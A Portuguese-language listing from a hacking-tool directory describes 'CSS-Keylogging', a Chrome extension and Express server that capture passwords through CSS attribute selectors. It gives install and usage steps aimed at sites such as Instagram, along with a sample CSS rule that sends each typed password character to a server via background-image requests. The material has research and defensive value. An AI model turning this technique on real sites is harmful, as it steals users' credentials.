Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CSS-Keylogging — Extensão do Chrome e servidor Express que exploram as capacidades de keylogging do CSS. | Kitploit
Ferramentas/GitHubGitHub/maxchehab/css-keylogging
ExploraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHubmaxchehab/css-keylogging

CSS-Keylogging

Extensão do Chrome e servidor Express que exploram as capacidades de keylogging do CSS.

Ver Repositório
3.2k424há 8 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Keylogger CSS

Extensão do Chrome e servidor Express que explora capacidades de keylogging do CSS.

Para usar

Configurar extensão do Chrome

  1. Baixar repositório git clone https://github.com/maxchehab/CSS-Keylogging
  2. Visite chrome://extensions no seu navegador (ou abra o menu do Chrome clicando no ícone à direita da Omnibox: o ícone do menu são três barras horizontais. e selecione Extensões no menu Mais Ferramentas para chegar ao mesmo lugar).
  3. Certifique-se de que a caixa de seleção Modo do desenvolvedor no canto superior direito está marcada.
  4. Clique em Carregar extensão não empacotada… para abrir uma janela de seleção de arquivo.
  5. Selecione a pasta css-keylogger-extension no diretório onde você baixou este repositório.

Configurar servidor Express

  1. yarn
  2. yarn start

Hackeando senhas l33t

  1. Abra um site que use um framework de componentes controlados como React. https://instagram.com.
  2. Pressione o ícone da extensão C no canto superior direito de qualquer página.
  3. Digite sua senha.
  4. Sua senha deve ser capturada pelo servidor Express.

Como funciona

Este ataque é muito simples. Utilizando seletores de atributo CSS, é possível solicitar recursos de um servidor externo sob o pretexto de carregar uma background-image.

Por exemplo, o seguinte CSS selecionará todos os inputs com type igual a password e value que termine com a. Ele tentará então carregar uma imagem de http://localhost:3000/a.

root@kitploit:~
input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

Usando um simples script pode-se criar um arquivo css que enviará uma requisição personalizada para cada caractere ASCII.

Baixar ferramenta